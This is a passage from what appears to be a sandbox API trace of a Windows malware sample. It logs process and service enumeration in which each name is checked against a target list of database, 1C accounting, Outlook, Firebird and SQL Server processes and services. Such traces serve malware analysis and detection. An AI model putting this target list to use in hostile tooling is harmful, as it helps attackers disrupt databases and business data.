hSnapshot=0x3a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0269.556] lstrlenW (lpString="System") returned 6 [0269.556] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0269.556] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0269.556] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0269.556] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0269.556] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0269.556] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0269.556] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0269.556] Process32NextW (in: hSnapshot=0x3a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0269.556] lstrlenW (lpString="smss.exe") returned 8 [0269.556] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0269.556] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0269.556] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0269.556] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0269.556] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0269.556] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0269.556] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0269.556] Process32NextW (in: hSnapshot=0x3a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0269.557] lstrlenW (lpString="csrss.exe") returned 9 [0269.557] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0269.557] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0269.557] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0269.557] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0269.557] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0269.557] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0269.557] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0269.557] Process32NextW (in: hSnapshot=0x3a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0269.557] lstrlenW (lpString="wininit.exe") returned 11 [0269.557] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0269.557] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0269.557] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0269.557] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0269.557] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0269.557] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0269.557] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0269.558] Process32NextW (in: hSnapshot=0x3a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0269.558] lstrlenW (lpString="csrss.exe") returned 9 [0269.558] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0269.558] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0269.558] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0269.558] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0269.558] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0269.558] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0269.558] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0269.558] Process32NextW (in: hSnapshot=0x3a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0269.558] lstrlenW (lpString="winlogon.exe") returned 12 [0269.558] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0269.558] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0269.558] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0269.558] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0269.559] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0269.559] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0269.559] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0269.559] Process32NextW (in: hSnapshot=0x3a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0269.559] lstrlenW (lpString="services.exe") returned 12 [0269.559] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0269.559] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0269.559] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0269.559] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0269.559] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0269.559] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0269.559] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0269.559] Process32NextW (in: hSnapshot=0x3a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0269.559] lstrlenW (lpString="lsass.exe") returned 9 [0269.559] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0269.560] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0269.560] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0269.560] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0269.560] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0269.560] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0269.560] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0269.560] Process32NextW (in: hSnapshot=0x3a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0269.560] lstrlenW (lpString="lsm.exe") returned 7 [0269.560] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0269.560] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0269.560] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0269.560] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0269.560] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0269.560] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0269.560] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0269.560] Process32NextW (in: hSnapshot=0x3a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0269.560] lstrlenW (lpString="svchost.exe") returned 11 [0269.561] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0269.561] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0269.561] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0269.561] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0269.561] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0269.561] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0269.561] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0269.561] Process32NextW (in: hSnapshot=0x3a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0269.561] lstrlenW (lpString="svchost.exe") returned 11 [0269.561] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0269.561] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0269.561] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0269.561] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0269.561] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0269.561] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0269.561] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0269.561] Process32NextW (in: hSnapshot=0x3a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0269.562] lstrlenW (lpString="svchost.exe") returned 11 [0269.562] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0269.562] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0269.562] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0269.562] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0269.562] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0269.562] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0269.562] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0269.562] Process32NextW (in: hSnapshot=0x3a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0269.562] lstrlenW (lpString="svchost.exe") returned 11 [0269.562] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0269.562] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0269.562] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0269.562] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0269.562] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0269.562] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0269.563] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0269.563] Process32NextW (in: hSnapshot=0x3a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0269.563] lstrlenW (lpString="svchost.exe") returned 11 [0269.563] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0269.563] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0269.563] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0269.563] Process32NextW (in: hSnapshot=0x3a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0269.563] lstrlenW (lpString="audiodg.exe") returned 11 [0269.563] Process32NextW (in: hSnapshot=0x3a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0269.564] lstrlenW (lpString="svchost.exe") returned 11 [0269.564] Process32NextW (in: hSnapshot=0x3a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0269.564] lstrlenW (lpString="svchost.exe") returned 11 [0269.564] Process32NextW (in: hSnapshot=0x3a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0269.565] lstrlenW (lpString="userinit.exe") returned 12 [0269.565] Process32NextW (in: hSnapshot=0x3a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x348, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0269.565] lstrlenW (lpString="dwm.exe") returned 7 [0269.565] Process32NextW (in: hSnapshot=0x3a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0269.565] lstrlenW (lpString="explorer.exe") returned 12 [0269.565] Process32NextW (in: hSnapshot=0x3a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0269.813] lstrlenW (lpString="spoolsv.exe") returned 11 [0269.813] Process32NextW (in: hSnapshot=0x3a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0269.813] lstrlenW (lpString="taskhost.exe") returned 12 [0269.814] Process32NextW (in: hSnapshot=0x3a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0269.814] lstrlenW (lpString="svchost.exe") returned 11 [0269.814] Process32NextW (in: hSnapshot=0x3a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0269.814] lstrlenW (lpString="payload.exe") returned 11 [0269.814] Process32NextW (in: hSnapshot=0x3a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0269.815] lstrlenW (lpString="dllhost.exe") returned 11 [0269.815] Process32NextW (in: hSnapshot=0x3a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0269.815] lstrlenW (lpString="reader_sl.exe") returned 13 [0269.815] Process32NextW (in: hSnapshot=0x3a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0269.815] CloseHandle (hObject=0x3a8) returned 1 [0269.815] Sleep (dwMilliseconds=0x1f4) [0270.404] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x43c09a8 [0270.790] EnumServicesStatusExW (in: hSCManager=0x43c09a8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0270.790] GetLastError () returned 0xea [0270.790] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc9a) returned 0x57d8c0 [0270.791] EnumServicesStatusExW (in: hSCManager=0x43c09a8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x57d8c0, cbBufSize=0xc9a, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x57d8c0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0270.791] CloseServiceHandle (hSCObject=0x43c09a8) returned 1 [0270.791] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0270.791] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0270.791] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0270.791] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0270.791] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0270.791] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0270.791] lstrlenW (lpString="AudioSrv") returned 8 [0270.791] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0270.791] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0270.791] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0270.791] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0270.791] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0270.791] lstrlenW (lpString="BFE") returned 3 [0270.791] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0270.791] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0270.791] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0270.791] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0270.791] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0270.791] lstrlenW (lpString="CryptSvc") returned 8 [0270.792] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0270.792] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0270.792] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0270.792] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0270.792] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0270.792] lstrlenW (lpString="CscService") returned 10 [0270.792] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0270.792] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0270.792] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0270.792] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0270.792] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0270.792] lstrlenW (lpString="DcomLaunch") returned 10 [0270.792] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0270.792] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0270.792] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0270.792] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0270.792] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0270.792] lstrlenW (lpString="Dhcp") returned 4 [0270.792] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0270.792] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0270.792] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0270.792] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0270.792] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0270.792] lstrlenW (lpString="Dnscache") returned 8 [0270.792] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0270.792] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0270.792] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0270.792] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0270.792] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0270.792] lstrlenW (lpString="DPS") returned 3 [0270.793] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0270.793] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0270.793] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0270.793] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0270.793] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0270.793] lstrlenW (lpString="eventlog") returned 8 [0270.793] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0270.793] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0270.793] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0270.793] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0270.793] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0270.793] lstrlenW (lpString="EventSystem") returned 11 [0270.793] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0270.793] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0270.793] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0270.793] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0270.793] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0270.793] lstrlenW (lpString="gpsvc") returned 5 [0270.793] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0270.793] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0270.793] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0270.793] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0270.793] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0270.793] lstrlenW (lpString="LanmanWorkstation") returned 17 [0270.793] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0270.793] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0270.793] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0270.793] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0270.793] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0270.794] lstrlenW (lpString="lmhosts") returned 7 [0270.794] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0270.794] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0270.794] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0270.794] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0270.794] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0270.794] lstrlenW (lpString="MMCSS") returned 5 [0270.794] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0270.794] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0270.794] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0270.794] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0270.794] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0270.794] lstrlenW (lpString="MpsSvc") returned 6 [0270.794] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0270.794] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0270.794] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0270.794] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0270.794] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0270.794] lstrlenW (lpString="NlaSvc") returned 6 [0270.794] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0270.794] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0270.794] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0270.794] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0270.794] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0270.794] lstrlenW (lpString="nsi") returned 3 